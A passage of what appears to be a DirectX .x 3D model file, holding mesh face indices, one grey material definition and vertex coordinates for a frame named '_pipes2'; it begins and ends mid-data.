3;54,76,74;, 4;71,70,74,73;, 4;73,90,88,71;, 4;31,110,108,29;, 4;32,31,29,28;, 3;50,32,28;, 5;32,50,47,38,34;, 4;50,49,48,47;, 3;49,50,51;, 3;118,49,51;, 3;49,118,141;, 3;49,141,119;, 4;119,112,48,49;, 4;46,48,112,114;, 3;46,47,48;, 4;47,46,45,44;, 3;43,44,45;, 4;103,102,43,45;, 4;43,102,100,41;, 4;44,43,41,40;, 3;40,47,44;, 3;38,47,40;, 4;38,37,35,34;, 4;37,106,104,35;, 4;67,94,92,65;, 4;65,64,68,67;, 3;56,64,62;, 3;56,62,58;, 4;59,58,62,61;, 4;61,98,96,59;, 4;60,59,96,97;, 3;58,59,60;, 4;57,56,58,60;, 4;117,124,52,55;, 3;50,28,27;, 4;79,78,51,50;, 3;78,79,80;, 4;78,80,120,121;, 4;51,78,121,118;, 4;1,115,57,60;, 4;114,115,1,0;, 4;114,0,45,46;, 4;0,21,103,45;, 4;60,97,14,1;, 3;61,62,63;, 4;99,98,61,63;, 4;5,4,63,66;, 4;63,62,64,66;, 3;64,65,66;, 4;66,65,92,93;, 3;67,68,69;, 4;95,94,67,69;, 4;7,6,69,72;, 4;69,68,70,72;, 3;70,71,72;, 4;72,71,88,89;, 3;73,74,75;, 4;91,90,73,75;, 4;75,74,76,77;, 4;75,77,2,8;, 3;366,369,368;, 4;320,317,272,311;, 4;215,216,265,266;, 4;266,191,192,215;, 4;298,219,202,213;, 4;208,197,264,280;, 4;278,261,196,207;, 4;214,201,222,300;, 4;294,225,200,211;, 4;206,195,258,284;, 4;282,255,194,205;, 4;212,199,228,296;, 4;290,231,198,209;, 4;204,193,252,288;, 3;190,189,203;, 3;189,210,203;, 3;0,1,14;, 3;21,0,14;, 4;4,15,99,63;, 4;42,101,20,9;, 4;10,23,107,39;, 4;66,93,16,5;, 4;6,17,95,69;, 4;36,105,22,11;, 4;12,25,111,33;, 4;72,89,18,7;, 4;8,19,91,75;, 4;30,109,24,13;, 4;2,77,26,3;, 4;27,26,77,76;, 3;180,177,179;, 4;128,131,122,83;, 4;90,91,89,88;, 4;18,89,91,19;, 4;94,95,93,92;, 4;16,93,95,17;, 4;14,97,99,15;, 4;98,99,97,96;, 3;142,143,144;, 4;131,130,144,143;, 5;143,180,179,122,131;, 3;179,123,122;, 4;179,151,120,123;, 3;151,121,120;, 5;151,150,141,118,121;, 3;149,150,151;, 7;119,141,150,149,139,113,112;, 3;112,113,114;, 3;113,115,114;, 3;115,113,116;, 4;116,113,139,145;, 3;139,146,145;, 3;146,144,145;, 3;145,144,127;, 3;144,130,127;, 3;144,146,142;, 3;145,127,126;, 6;126,125,124,117,116,145;, 3;271,270,272;, 4;312,311,272,270;, 4;270,269,309,312;, 4;270,271,268,269;, 3;268,271,239;, 6;271,273,243,265,216,239;, 3;275,243,273;, 4;273,318,274,275;, 4;319,316,274,318;, 4;320,319,318,317;, 3;317,318,273;, 4;272,317,273,271;, 3;268,267,269;, 4;269,267,310,309;, 4;267,240,307,310;, 4;267,268,239,240;, 3;239,238,240;, 3;238,307,240;, 4;307,238,308,330;, 4;301,308,238,237;, 4;238,239,236,237;, 5;223,236,239,217,221;, 3;217,239,216;, 4;220,221,217,218;, 4;299,220,218,297;, 4;279,262,260,277;, 4;259,260,262,263;, 3;259,263,243;, 3;259,243,257;, 4;257,243,245,253;, 4;244,245,243,241;, 3;242,241,243;, 3;241,242,314;, 3;241,314,313;, 4;313,306,244,241;, 3;253,245,251;, 3;251,245,247;, 4;247,248,250,251;, 4;287,250,248,285;, 4;248,249,286,285;, 3;248,247,249;, 4;245,246,249,247;, 4;291,292,234,232;, 3;233,232,234;, 4;235,236,233,234;, 3;236,235,237;, 4;237,235,303,301;, 5;236,223,227,229,233;, 4;226,227,223,224;, 4;295,226,224,293;, 4;283,256,254,281;, 4;253,254,256,257;, 4;291,232,230,289;, 4;232,233,229,230;, 3;265,243,263;, 4;242,243,275,276;, 3;275,274,276;, 4;316,315,276,274;, 4;315,314,242,276;, 5;369,332,320,311,368;, 3;333,320,332;, 3;332,331,333;, 3;335,333,331;, 3;333,335,334;, 3;333,334,316;, 3;319,333,316;, 3;320,333,319;, 3;316,334,315;, 6;314,315,334,305,306,313;, 5;302,304,305,334,328;, 3;303,304,302;, 3;302,301,303;, 7;330,308,301,302,328,338,339;, 3;339,338,340;, 5;339,340,310,307,330;, 3;310,340,309;, 4;340,368,312,309;, 3;312,368,311;, 3;335,328,334;, 3;328,335,327;, 5;327,335,325,326,329;, 3;332,321,331;, 4;321,325,335,331;, 4;326,325,321,322;, 3;370,369,372;, 6;322,321,332,369,370,343;, 3;218,217,219;, 4;218,219,298,297;, 4;300,299,297,298;, 4;214,300,298,213;, 3;221,220,222;, 4;222,220,299,300;, 4;225,223,221,222;, 4;225,222,201,200;, 3;224,223,225;, 4;224,225,294,293;, 4;296,295,293,294;, 4;212,296,294,211;, 3;227,226,228;, 4;228,226,295,296;, 3;230,229,231;, 4;230,231,290,289;, 4;292,291,289,290;, 4;290,209,210,292;, 4;303,189,190,304;, 4;189,303,235,234;, 4;210,189,234,292;, 4;286,249,190,203;, 4;304,190,249,246;, 4;251,252,255,253;, 4;193,194,255,252;, 4;254,255,282,281;, 3;254,253,255;, 4;283,284,258,256;, 3;257,256,258;, 4;257,258,261,259;, 4;195,196,261,258;, 4;260,261,278,277;, 3;260,259,261;, 4;279,280,264,262;, 3;263,262,264;, 4;263,264,266,265;, 4;266,264,197,191;, 4;280,279,277,278;, 4;278,207,208,280;, 4;284,283,281,282;, 4;282,205,206,284;, 4;287,288,252,250;, 3;251,250,252;, 4;288,287,285,286;, 4;286,203,204,288;, 3;202,192,213;, 5;197,208,213,192,191;, 4;208,207,214,213;, 5;206,214,207,196,195;, 5;214,206,211,200,201;, 4;212,211,206,205;, 5;204,212,205,194,193;, 5;212,204,209,198,199;, 4;204,203,210,209;, 4;102,103,101,100;, 4;20,101,103,21;, 4;42,41,100,101;, 3;40,41,42;, 4;40,42,39,38;, 4;39,42,9,10;, 4;37,39,107,106;, 3;37,38,39;, 4;107,23,22,105;, 4;106,107,105,104;, 4;36,35,104,105;, 3;34,35,36;, 4;34,36,33,32;, 4;33,36,11,12;, 4;31,33,111,110;, 3;31,32,33;, 4;111,25,24,109;, 4;110,111,109,108;, 4;30,29,108,109;, 3;28,29,30;, 4;28,30,26,27;, 4;13,3,26,30;, 5;19,8,2,3,24;, 3;3,13,24;, 4;18,19,24,25;, 5;25,17,6,7,18;, 3;17,25,22;, 4;22,25,12,11;, 4;22,23,16,17;, 3;23,15,16;, 5;15,23,10,9,20;, 4;14,15,20,21;, 4;16,15,4,5;, 3;132,143,142;, 4;136,132,142,146;, 3;136,133,132;, 3;136,137,133;, 5;146,138,140,137,136;, 3;146,139,138;, 6;132,133,154,181,180,143;, 3;180,181,183;, 6;166,185,184,188,187,168;, 4;167,166,168,169;, 4;134,167,169,154;, 4;153,152,134,154;, 5;140,153,154,133,137;, 5;164,176,186,185,166;, 4;165,164,166,167;, 4;163,162,164,165;, 4;135,156,163,165;, 4;155,161,163,156;, 4;175,161,155,160;, 4;160,159,174,175;, 4;173,174,159,157;, 3;177,178,179;, 5;151,179,178,135,147;, 4;147,135,134,152;, 4;135,165,167,134;, 4;148,147,152,153;, 4;149,151,147,148;, 4;138,139,149,148;, 4;148,153,140,138;, 4;219,217,216,215;, 4;192,202,219,215;, 4;231,229,227,228;, 4;231,228,199,198;, 6;374,355,357,376,377,373;, 4;355,356,358,357;, 4;356,323,343,358;, 4;341,342,343,323;, 5;342,329,326,322,343;, 5;365,353,355,374,375;, 4;353,354,356,355;, 4;351,352,354,353;, 4;345,324,354,352;, 4;350,344,345,352;, 4;350,364,349,344;, 4;348,349,364,363;, 4;363,362,346,348;, 4;362,361,347,346;, 5;372,347,361,360,371;, 5;358,343,370,371,360;, 4;357,358,360,359;, 3;370,372,371;, 3;367,366,368;, 5;368,340,336,324,367;, 4;324,336,341,323;, 4;354,324,323,356;, 4;336,337,342,341;, 4;340,338,337,336;, 4;328,327,337,338;, 4;342,337,327,329;, 4;172,173,157,158;, 5;158,183,182,171,172;, 3;183,181,182;, 5;154,169,171,182,181;, 4;169,168,170,171;, 3;177,180,183;, 7;183,158,157,159,160,155,177;, 5;178,177,155,156,135;, 5;366,367,324,345,344;, 7;347,372,366,344,349,348,346;, 3;369,366,372;; MeshMaterialList { 1; 382; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.784314;0.784314;0.784314;1.0;; 60.0; 0.784314;0.784314;0.784314;; 0.498039;0.498039;0.498039;; } # Material } # MeshMaterialList } # Mesh } # Frame _headcvr Frame _pipes2 { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh pipes2 { 786; 0.219172;0.012080;-0.684640;, 0.219169;0.012080;-0.813677;, 0.219166;0.012080;-0.942713;, 0.336751;0.144197;-0.942716;, 0.336758;0.144197;-0.684643;, 0.367837;0.116535;-0.684644;, 0.250253;-0.015582;-0.684640;, 0.250249;-0.015582;-0.813677;, 0.250246;-0.015582;-0.942714;, 0.367832;0.116535;-0.942717;, 0.219181;0.012080;-0.360604;, 0.219178;0.012080;-0.489640;, 0.219173;0.012080;-0.618678;, 0.336759;0.144197;-0.618681;, 0.336766;0.144197;-0.360607;, 0.367846;0.116535;-0.360608;, 0.250262;-0.015582;-0.360605;, 0.250257;-0.015582;-0.489641;, 0.250255;-0.015582;-0.618679;, 0.367840;0.116535;-0.618682;, 0.219192;0.012080;0.071206;, 0.219189;0.012080;-0.057831;, 0.336773;0.144197;-0.057834;, 0.336781;0.144197;0.199405;, 0.219196;0.012080;0.199408;, 0.250276;-0.015582;0.199407;, 0.250273;-0.015582;0.071205;, 0.250269;-0.015582;-0.057831;, 0.367855;0.116535;-0.057834;, 0.367861;0.116535;0.199404;, 0.287172;0.088488;-0.873874;, 0.260778;0.058835;-0.866303;, 0.240129;0.035631;-0.839806;, 0.230753;0.025096;-0.801484;, 0.235166;0.030052;-0.761607;, 0.252182;0.049170;-0.730859;, 0.277244;0.077329;-0.717478;, 0.303637;0.106983;-0.725050;, 0.324287;0.130186;-0.751547;, 0.333662;0.140721;-0.789869;, 0.329249;0.135766;-0.829745;, 0.312233;0.116646;-0.860495;, 0.468955;-0.022345;-0.847706;, 0.442634;-0.053348;-0.840794;, 0.424648;-0.078664;-0.814165;, 0.419818;-0.091510;-0.774953;, 0.429438;-0.088443;-0.733664;, 0.450928;-0.070285;-0.701364;, 0.478532;-0.041901;-0.686706;, 0.504854;-0.010897;-0.693619;, 0.522839;0.014418;-0.720248;, 0.527668;0.027265;-0.759461;, 0.518049;0.024197;-0.800748;, 0.496559;0.006039;-0.833048;, 0.541327;-0.116155;-0.893222;, 0.511565;-0.142697;-0.884145;, 0.497159;-0.172656;-0.859767;, 0.501976;-0.198002;-0.826621;, 0.524719;-0.211945;-0.793586;, 0.559294;-0.210748;-0.769516;, 0.596441;-0.194734;-0.760860;, 0.626204;-0.168192;-0.769937;, 0.640608;-0.138234;-0.794314;, 0.635793;-0.112887;-0.827460;, 0.613051;-0.098945;-0.860495;, 0.578475;-0.100141;-0.884564;, 0.582932;-0.208339;-1.015723;, 0.551737;-0.231705;-1.002426;, 0.538123;-0.263413;-0.980375;, 0.545739;-0.294968;-0.955476;, 0.572544;-0.317913;-0.934405;, 0.611356;-0.326101;-0.922805;, 0.651776;-0.317339;-0.923786;, 0.682970;-0.293972;-0.937082;, 0.696585;-0.262266;-0.959135;, 0.688970;-0.230711;-0.984032;, 0.662165;-0.207765;-1.005103;, 0.623352;-0.199577;-1.016704;, 0.575478;-0.312365;-1.152936;, 0.544799;-0.328527;-1.130136;, 0.531524;-0.355504;-1.101844;, 0.539210;-0.386066;-1.075639;, 0.565799;-0.412026;-1.058544;, 0.604165;-0.426428;-1.055140;, 0.644029;-0.425412;-1.066338;, 0.674709;-0.409251;-1.089138;, 0.687984;-0.382273;-1.117431;, 0.680296;-0.351711;-1.143636;, 0.653708;-0.325750;-1.160730;, 0.615342;-0.311349;-1.164134;, 0.521066;-0.431738;-1.258544;, 0.495564;-0.436539;-1.225692;, 0.487018;-0.453140;-1.188221;, 0.497715;-0.477095;-1.156171;, 0.524795;-0.501985;-1.138128;, 0.560995;-0.521140;-1.138930;, 0.596617;-0.529429;-1.158359;, 0.622118;-0.524628;-1.191211;, 0.630663;-0.508026;-1.228682;, 0.619965;-0.484071;-1.260733;, 0.592889;-0.459182;-1.278775;, 0.556689;-0.440026;-1.277974;, 0.439873;-0.563682;-1.297296;, 0.424310;-0.552335;-1.259702;, 0.426394;-0.551661;-1.217156;, 0.445567;-0.561844;-1.181062;, 0.476694;-0.580153;-1.161086;, 0.511432;-0.601683;-1.162585;, 0.540474;-0.620664;-1.185155;, 0.556040;-0.632013;-1.222750;, 0.553955;-0.632686;-1.265295;, 0.534781;-0.622504;-1.301390;, 0.503655;-0.604195;-1.321364;, 0.468915;-0.582665;-1.319867;, 0.362109;-0.689051;-1.247835;, 0.355550;-0.663185;-1.215970;, 0.367953;-0.645878;-1.179987;, 0.395993;-0.641767;-1.149531;, 0.432156;-0.651956;-1.132759;, 0.466752;-0.673714;-1.134168;, 0.490515;-0.701209;-1.153381;, 0.497074;-0.727076;-1.185245;, 0.484671;-0.744384;-1.221229;, 0.456633;-0.748493;-1.251686;, 0.420468;-0.738305;-1.268456;, 0.385870;-0.716548;-1.267048;, 0.302927;-0.791745;-1.139136;, 0.301330;-0.757268;-1.116381;, 0.319275;-0.730341;-1.090580;, 0.351954;-0.718179;-1.068647;, 0.390613;-0.724039;-1.056458;, 0.424890;-0.746353;-1.057277;, 0.445604;-0.779139;-1.070889;, 0.447201;-0.813615;-1.093642;, 0.429255;-0.840541;-1.119443;, 0.396575;-0.852704;-1.141378;, 0.357918;-0.846844;-1.153566;, 0.323641;-0.824531;-1.152746;, 0.257392;-0.858999;-0.996907;, 0.258634;-0.820333;-0.983016;, 0.279581;-0.788972;-0.966591;, 0.314621;-0.773321;-0.952037;, 0.354370;-0.777571;-0.943252;, 0.388173;-0.800587;-0.942587;, 0.406972;-0.836198;-0.950226;, 0.405733;-0.874865;-0.964117;, 0.384785;-0.906226;-0.980540;, 0.349741;-0.921877;-0.995095;, 0.309996;-0.917626;-1.003881;, 0.276194;-0.894611;-1.004545;, 0.225132;-0.897229;-0.837641;, 0.227365;-0.857388;-0.828649;, 0.249586;-0.824517;-0.818511;, 0.285841;-0.807428;-0.809942;, 0.326416;-0.810699;-0.805241;, 0.360436;-0.833452;-0.805665;, 0.378793;-0.869593;-0.811104;, 0.376561;-0.909436;-0.820095;, 0.354340;-0.942304;-0.830234;, 0.318085;-0.959394;-0.838801;, 0.277510;-0.956123;-0.843504;, 0.243486;-0.933369;-0.843078;, 0.214315;-0.929451;-0.674056;, 0.216751;-0.889008;-0.668116;, 0.239323;-0.855085;-0.663317;, 0.275988;-0.836776;-0.660949;, 0.316921;-0.838984;-0.661644;, 0.351150;-0.861117;-0.665216;, 0.369510;-0.897246;-0.670708;, 0.367074;-0.937689;-0.676649;, 0.344501;-0.971611;-0.681446;, 0.307836;-0.989921;-0.683816;, 0.266905;-0.987712;-0.683121;, 0.232675;-0.965579;-0.679549;, 0.227999;-0.945655;-0.509614;, 0.230102;-0.904820;-0.507653;, 0.252136;-0.870259;-0.509344;, 0.288198;-0.851234;-0.514234;, 0.328623;-0.852842;-0.521012;, 0.362581;-0.874652;-0.527864;, 0.380971;-0.910820;-0.532951;, 0.378869;-0.951657;-0.534912;, 0.356834;-0.986219;-0.533221;, 0.320774;-1.005243;-0.528331;, 0.280348;-1.003635;-0.521553;, 0.246389;-0.981824;-0.514702;, 0.267980;-0.947837;-0.349353;, 0.269561;-0.906972;-0.349490;, 0.290546;-0.872355;-0.355376;, 0.325319;-0.853260;-0.365435;, 0.364558;-0.854803;-0.376971;, 0.397747;-0.876572;-0.386893;, 0.415998;-0.912732;-0.392544;, 0.414420;-0.953597;-0.392407;, 0.393433;-0.988214;-0.386521;, 0.358661;-1.007310;-0.376462;, 0.319423;-1.005767;-0.364925;, 0.286232;-0.983998;-0.355003;, 0.322571;-0.948206;-0.188315;, 0.323868;-0.907338;-0.189282;, 0.344814;-0.872721;-0.195292;, 0.379795;-0.853627;-0.204733;, 0.419437;-0.855173;-0.215075;, 0.453122;-0.876944;-0.223550;, 0.471817;-0.913109;-0.227885;, 0.470519;-0.953975;-0.226918;, 0.449574;-0.988593;-0.220909;, 0.414595;-1.007687;-0.211468;, 0.374949;-1.006141;-0.201124;, 0.341269;-0.984369;-0.192650;, 0.361175;-0.941522;0.018319;, 0.362390;-0.900672;0.016898;, 0.383756;-0.865979;0.013142;, 0.419550;-0.846746;0.008059;, 0.460182;-0.848121;0.003006;, 0.494764;-0.869736;-0.000659;, 0.514030;-0.905803;-0.001953;, 0.512815;-0.946655;-0.000532;, 0.491448;-0.981345;0.003223;, 0.455655;-1.000580;0.008308;, 0.415023;-0.999204;0.013359;, 0.380442;-0.977588;0.017024;, 0.378178;-0.933717;0.280543;, 0.379440;-0.892841;0.279886;, 0.400968;-0.858077;0.278625;, 0.436994;-0.838736;0.277099;, 0.477863;-0.840002;0.275716;, 0.512626;-0.861534;0.274846;, 0.531966;-0.897565;0.274723;, 0.530703;-0.938440;0.275379;, 0.509175;-0.973206;0.276640;, 0.473150;-0.992546;0.278166;, 0.432281;-0.991281;0.279550;, 0.397518;-0.969747;0.280420;, 0.379340;-0.933633;0.580540;, 0.380606;-0.892757;0.580936;, 0.402142;-0.857991;0.581556;, 0.438176;-0.838651;0.582231;, 0.479053;-0.839916;0.582778;, 0.513819;-0.861448;0.583055;, 0.533162;-0.897479;0.582985;, 0.531895;-0.938354;0.582587;, 0.510359;-0.973120;0.581968;, 0.474324;-0.992461;0.581295;, 0.433448;-0.991196;0.580745;, 0.398681;-0.969664;0.580469;, 0.369024;-0.939858;0.910010;, 0.370274;-0.898993;0.910974;, 0.391778;-0.864245;0.912530;, 0.427781;-0.844923;0.914263;, 0.468628;-0.846206;0.915706;, 0.503378;-0.867748;0.916474;, 0.522724;-0.903778;0.916362;, 0.521473;-0.944643;0.915398;, 0.499968;-0.979390;0.913842;, 0.463965;-0.998712;0.912110;, 0.423117;-0.997429;0.910666;, 0.388366;-0.975888;0.909897;, 0.355314;-0.948619;1.246171;, 0.356590;-0.907737;1.246479;, 0.378088;-0.872994;1.248206;, 0.414050;-0.853698;1.250888;, 0.454840;-0.855017;1.253809;, 0.489526;-0.876602;1.256185;, 0.508813;-0.912665;1.257378;, 0.507539;-0.953547;1.257072;, 0.486040;-0.988291;1.255344;, 0.450078;-1.007588;1.252660;, 0.409287;-1.006267;1.249740;, 0.374603;-0.984683;1.247364;, 0.307629;-0.941394;1.709694;, 0.308987;-0.900526;1.709196;, 0.330492;-0.865782;1.710867;, 0.366383;-0.846476;1.714260;, 0.407037;-0.847775;1.718462;, 0.441567;-0.869336;1.722352;, 0.460720;-0.905380;1.724884;, 0.459361;-0.946248;1.725380;, 0.437856;-0.980990;1.723709;, 0.401967;-1.000299;1.720316;, 0.361310;-0.998998;1.716113;, 0.326780;-0.977437;1.712225;, 0.281717;0.082349;-0.568146;, 0.256870;0.054431;-0.557340;, 0.238815;0.034144;-0.528263;, 0.232388;0.026924;-0.488707;, 0.239314;0.034704;-0.449270;, 0.257735;0.055401;-0.420519;, 0.282715;0.083468;-0.410158;, 0.307561;0.111384;-0.420966;, 0.325617;0.131673;-0.450041;, 0.332043;0.138893;-0.489597;, 0.325118;0.131113;-0.529034;, 0.306696;0.110417;-0.557785;, 0.564785;-0.035859;-0.572290;, 0.545496;-0.070498;-0.561429;, 0.536323;-0.097852;-0.532379;, 0.539727;-0.110590;-0.492924;, 0.554795;-0.105301;-0.453633;, 0.577487;-0.083399;-0.425038;, 0.601726;-0.050754;-0.414799;, 0.621016;-0.016115;-0.425660;, 0.630187;0.011238;-0.454710;, 0.626782;0.023977;-0.494166;, 0.611718;0.018686;-0.533456;, 0.589024;-0.003216;-0.562050;, 0.672793;-0.140007;-0.647732;, 0.650153;-0.171416;-0.634530;, 0.644895;-0.202543;-0.608213;, 0.658430;-0.225051;-0.575835;, 0.687129;-0.232906;-0.546069;, 0.723305;-0.224005;-0.526889;, 0.757263;-0.200734;-0.523440;, 0.779903;-0.169326;-0.536641;, 0.785161;-0.138198;-0.562956;, 0.771626;-0.115691;-0.595336;, 0.742927;-0.107834;-0.625102;, 0.706750;-0.116735;-0.644282;, 0.721332;-0.233514;-0.774301;, 0.697160;-0.261970;-0.757103;, 0.692822;-0.294867;-0.733183;, 0.709480;-0.323394;-0.708948;, 0.742671;-0.339902;-0.690894;, 0.783504;-0.339972;-0.683860;, 0.821035;-0.323584;-0.689727;, 0.845208;-0.295129;-0.706924;, 0.849547;-0.262231;-0.730844;, 0.832889;-0.233705;-0.755079;, 0.799695;-0.217196;-0.773133;, 0.758863;-0.217126;-0.780168;, 0.716844;-0.333315;-0.905586;, 0.692985;-0.354813;-0.879234;, 0.688796;-0.384367;-0.850916;, 0.705401;-0.414062;-0.828220;, 0.738352;-0.435939;-0.817227;, 0.778819;-0.444135;-0.820883;, 0.815958;-0.436457;-0.838207;, 0.839819;-0.414961;-0.864559;, 0.844007;-0.385405;-0.892877;, 0.827403;-0.355712;-0.915574;, 0.794451;-0.333835;-0.926566;, 0.753984;-0.325638;-0.922910;, 0.659339;-0.443171;-1.003414;, 0.641732;-0.452725;-0.966427;, 0.641963;-0.473834;-0.930588;, 0.659976;-0.500842;-0.905499;, 0.690940;-0.526511;-0.897882;, 0.726562;-0.543965;-0.909783;, 0.757296;-0.548526;-0.938007;, 0.774905;-0.538971;-0.974993;, 0.774672;-0.517865;-1.010833;, 0.756660;-0.490856;-1.035922;, 0.725694;-0.465186;-1.043537;, 0.690073;-0.447732;-1.031638;, 0.563656;-0.557668;-1.037752;, 0.558938;-0.551797;-0.996139;, 0.569776;-0.560214;-0.956493;, 0.593267;-0.580666;-0.929439;, 0.623116;-0.607671;-0.922224;, 0.651326;-0.633996;-0.936783;, 0.670335;-0.652583;-0.969214;, 0.675054;-0.658454;-1.010828;, 0.664215;-0.650037;-1.050473;, 0.640724;-0.629585;-1.077528;, 0.610876;-0.602580;-1.084742;, 0.582665;-0.576256;-1.070184;, 0.456099;-0.665246;-0.993764;, 0.463879;-0.646875;-0.957262;, 0.486073;-0.643934;-0.922259;, 0.516736;-0.657213;-0.898139;, 0.547652;-0.683150;-0.891361;, 0.570537;-0.714798;-0.903743;, 0.579259;-0.743677;-0.931966;, 0.571481;-0.762049;-0.968468;, 0.549285;-0.764989;-1.003469;, 0.518621;-0.751712;-1.027592;, 0.487706;-0.725773;-1.034369;, 0.464822;-0.694125;-1.021988;, 0.361626;-0.760574;-0.890259;, 0.376841;-0.734699;-0.861904;, 0.406415;-0.724312;-0.834988;, 0.442421;-0.732198;-0.816721;, 0.475214;-0.756244;-0.811998;, 0.496005;-0.790004;-0.822084;, 0.499225;-0.824437;-0.844278;, 0.484008;-0.850313;-0.872632;, 0.454436;-0.860699;-0.899549;, 0.418427;-0.852813;-0.917815;, 0.385634;-0.828767;-0.922539;, 0.364844;-0.795007;-0.912453;, 0.295753;-0.836423;-0.751060;, 0.314956;-0.805956;-0.731130;, 0.348431;-0.791077;-0.712458;, 0.387208;-0.795774;-0.700046;, 0.420897;-0.818786;-0.697220;, 0.440472;-0.853948;-0.704738;, 0.440688;-0.891837;-0.720583;, 0.421484;-0.922304;-0.740513;, 0.388010;-0.937182;-0.759186;, 0.349232;-0.932485;-0.771598;, 0.315542;-0.909473;-0.774425;, 0.295967;-0.874313;-0.766907;, 0.253209;-0.883460;-0.599722;, 0.274595;-0.850581;-0.587557;, 0.309830;-0.833757;-0.575144;, 0.349473;-0.837498;-0.565807;, 0.382901;-0.860798;-0.562049;, 0.401157;-0.897417;-0.564878;, 0.399351;-0.937543;-0.573533;, 0.377964;-0.970422;-0.585698;, 0.342730;-0.987245;-0.598112;, 0.303089;-0.983506;-0.607448;, 0.269659;-0.960205;-0.611206;, 0.251402;-0.923585;-0.608377;, 0.217068;-0.899648;-0.442412;, 0.240149;-0.866008;-0.437632;, 0.276954;-0.848482;-0.432048;, 0.317616;-0.851764;-0.427159;, 0.351247;-0.874975;-0.424273;, 0.368829;-0.911897;-0.424164;, 0.365653;-0.952636;-0.426861;, 0.342571;-0.986275;-0.431642;, 0.305767;-1.003801;-0.437225;, 0.265101;-1.000520;-0.442114;, 0.231473;-0.977308;-0.445001;, 0.213892;-0.940387;-0.445109;, 0.213245;-0.901550;-0.276228;, 0.236485;-0.867834;-0.278232;, 0.273495;-0.850203;-0.281655;, 0.314362;-0.853385;-0.285585;, 0.348135;-0.876524;-0.288965;, 0.365763;-0.913423;-0.290890;, 0.362525;-0.954192;-0.290846;, 0.339287;-0.987908;-0.288844;, 0.302276;-1.005539;-0.285418;, 0.261409;-1.002358;-0.281489;, 0.227635;-0.979219;-0.278110;, 0.210007;-0.942320;-0.276184;, 0.248782;-0.901787;-0.112451;, 0.271070;-0.868064;-0.118817;, 0.306607;-0.850424;-0.129045;, 0.345865;-0.853595;-0.140392;, 0.378325;-0.876726;-0.149816;, 0.395292;-0.913620;-0.154795;, 0.392218;-0.954392;-0.153993;, 0.369925;-0.988114;-0.147625;, 0.334391;-1.005754;-0.137399;, 0.295133;-1.002583;-0.126052;, 0.262673;-0.979451;-0.116626;, 0.245707;-0.942559;-0.111649;, 0.307475;-0.902238;0.048978;, 0.328699;-0.868507;0.039675;, 0.362662;-0.850855;0.025125;, 0.400265;-0.854012;0.009227;, 0.431433;-0.877133;-0.003756;, 0.447812;-0.914023;-0.010349;, 0.445014;-0.954795;-0.008784;, 0.423790;-0.988528;0.000520;, 0.389829;-1.006179;0.015071;, 0.352225;-1.003022;0.030967;, 0.321058;-0.979900;0.043952;, 0.304678;-0.943011;0.050543;, 0.388605;-0.898561;0.215848;, 0.409006;-0.864868;0.204851;, 0.442181;-0.847251;0.188682;, 0.479245;-0.850433;0.171675;, 0.510263;-0.873561;0.158387;, 0.526925;-0.910438;0.152378;, 0.524767;-0.951182;0.155258;, 0.504368;-0.984876;0.166255;, 0.471191;-1.002492;0.182423;, 0.434129;-0.999309;0.199429;, 0.403109;-0.976182;0.212718;, 0.386446;-0.939306;0.218728;, 0.457889;-0.887547;0.373373;, 0.478949;-0.853748;0.363878;, 0.513718;-0.835878;0.351328;, 0.552876;-0.838727;0.339084;, 0.585933;-0.861531;0.330430;, 0.604031;-0.898179;0.327681;, 0.602321;-0.938854;0.331578;, 